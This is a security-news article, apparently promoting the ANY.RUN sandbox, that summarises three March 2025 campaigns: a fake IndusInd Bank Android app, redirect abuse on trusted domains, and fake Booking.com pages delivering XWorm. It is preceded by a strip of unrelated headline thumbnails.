![Lowest Prices Ever: Apple Pencil Pro Just $79.99, USB-C Pencil Only $49.99 [Deal]](https://www.iclarified.com/images/news/96863/96863/96863-640.jpg)
![Apple Releases iOS 18.4 RC 2 and iPadOS 18.4 RC 2 to Developers [Download]](https://www.iclarified.com/images/news/96860/96860/96860-640.jpg)
![What Google Messages features are rolling out [March 2025]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2023/12/google-messages-name-cover.png?resize=1200%2C628&quality=82&strip=all&ssl=1)
![[The AI Show Episode 141]: Road to AGI (and Beyond) #1 — The AI Timeline is Accelerating](https://www.marketingaiinstitute.com/hubfs/ep%20141.1.png)
![[The AI Show Episode 140]: New AGI Warnings, OpenAI Suggests Government Policy, Sam Altman Teases Creative Writing Model, Claude Web Search & Apple’s AI Woes](https://www.marketingaiinstitute.com/hubfs/ep%20140%20cover.png)
![[The AI Show Episode 139]: The Government Knows AGI Is Coming, Superintelligence Strategy, OpenAI’s $20,000 Per Month Agents & Top 100 Gen AI Apps](https://www.marketingaiinstitute.com/hubfs/ep%20139%20cover-2.png)
![From broke musician to working dev. How college drop-out Ryan Furrer taught himself to code [Podcast #166]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743189826063/2080cde4-6fc0-46fb-b98d-b3d59841e8c4.png?#)
![[FREE EBOOKS] The Ultimate Linux Shell Scripting Guide, Artificial Intelligence for Cybersecurity & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
.png?#)
![Mini Review: Rendering Ranger: R2 [Rewind] (Switch) - A Novel Run 'N' Gun/Shooter Hybrid That's Finally Affordable](https://images.nintendolife.com/0e9d68643dde0/large.jpg?#)
Top 3 Cyber Attacks In March 2025
March 2025 saw a sharp uptick in cyber threats that put both individual users and organizations at risk. From banking apps weaponized to steal personal data, to trusted domains abused for redirecting users to phishing traps, cybercriminals didn’t hold back. Their tactics are growing more creative and more dangerous. Here’s a breakdown of the three […] The post Top 3 Cyber Attacks In March 2025 appeared first on Cyber Security News.
March 2025 saw a sharp uptick in cyber threats that put both individual users and organizations at risk. From banking apps weaponized to steal personal data, to trusted domains abused for redirecting users to phishing traps, cybercriminals didn’t hold back.
Their tactics are growing more creative and more dangerous.
Here’s a breakdown of the three standout attacks that made headlines this month.
1. Fake Banking App Targeting Android Users via Telegram
A sophisticated malware dropper was spotted mimicking the IndusInd Bank app, targeting Android users in a phishing scheme aimed at stealing sensitive financial information.
Once installed, the malicious app displays a fake banking interface, tricking users into entering critical details like their mobile number, Aadhaar and PAN numbers, and net banking credentials.
After the victims submit the data, it is sent to both a phishing server and a Telegram-controlled command and control (C2) channel.
The APK itself contains base.apk, the core malicious payload, and has permissions to install other apps. The dropper is also obfuscated and uses XOR-encryption with a key (“npmanager”) to conceal its code and behavior.
You can see a real-world sample of this attack in ANY.RUN’s new Android sandbox:
Inside the sandbox, let’s explore the actual interface of the fake banking app and trace how the attack unfolds.
By following the process tree and network connections, you can observe how a user was tricked into submitting their credentials.
Network activity also reveals how the stolen data is sent to a phishing site, then forwarded to a Telegram-controlled command server.
This type of attack highlights just how quickly mobile threats are growing. One compromised employee can open the door to sensitive data, internal systems, and even financial accounts, putting the entire business in danger.
That’s why it’s so important for organizations to stay ahead of these threats. Giving your team the right tools to check suspicious apps before they become a problem is a lot easier and safer than dealing with a full-blown breach later.
Equip your team with the right tools to analyze suspicious threats in seconds inside a secure, isolated sandbox environment -> Sign up for 14-day ANY.RUN trial
2. Trusted Websites Exploited for Malicious Redirects
In another campaign exposed by ANY.RUN researchers in March, attackers abused redirect functions on long-standing, trusted domains to reroute users to phishing pages.
One such domain, registered back in 1996, was flagged as clean by antivirus tools giving users no reason to suspect anything was wrong.
In this ANY.RUN sandbox analysis, we can see the full picture of how the attack happens, starting with the targeted domain that was originally registered in 1996.
By exploiting weak redirect validation, threat actors turned these safe-looking URLs into a launchpad for malicious sites. Since users believed they were still on legitimate pages, or moving between them, they were far more likely to fall for the scam.
One of those redirects is a fake CAPTCHA page, which is automatically bypassed inside the sandbox thanks to its built-in interactivity feature, saving valuable time for security teams during analysis.
After that, the user lands on a phishing page designed to look like a legitimate Microsoft login screen. But a closer look at the URL reveals it’s anything but real, packed with random characters and clearly not tied to Microsoft.
These kinds of redirects damage user trust and make threat detection more difficult, especially when antivirus engines don’t flag them as dangerous.
3. Fake Booking.com Pages Delivering XWorm and Stealing Card Data
Cybercriminals love a familiar name, and this time, it was Booking.com in their target.
This campaign used fake Booking-branded pages created through cybersquatting. The attackers registered domains that closely resembled the legitimate Booking site, then led users through a convincing flow that ended in either malware execution or data theft.
.webp)
In this case, the fake page instructed users to press Win + R, paste a script, and hit enter. This launched XWorm malware, capable of stealing data and giving attackers remote control.
In another ANY.RUN analysis session, the phishing site prompted users to enter their credit card information to “verify their stay.” The page looked legit, but it was nothing more than a front for harvesting sensitive financial data.
Domains like Iili[.]io were linked to this campaign and were also seen in use with the Tycoon2FA phishing toolkit pointing to a more extensive infrastructure behind the scenes.
The attacks we saw in March all had one thing in common: they exploited trusted names and platforms to slip past users and security tools. That’s a wake-up call for organizations everywhere.
Here’s why quick, hands-on threat analysis is more important than ever:
- Popular websites and brands are being used as bait
From Booking.com to Microsoft, attackers are mimicking sites people trust.
- Redirects and fake apps are harder to catch
Many of these campaigns go unnoticed by antivirus tools until it’s too late.
- One employee’s mistake can expose your whole company
A single data theft can open access to internal systems, accounts, and sensitive data.
That’s why giving your team the right tools to investigate suspicious files and links is critical.
ANY.RUN’s interactive sandbox provides a secure, cloud-based environment to analyze threats in Windows, Linux, and Android systems fast and safely. Your team can trace how an attack unfolds, capture network activity, and collect IOCs in real time.
Protect your business before threats break through -> Start your 14-Day Trial of ANY.RUN today
The post Top 3 Cyber Attacks In March 2025 appeared first on Cyber Security News.
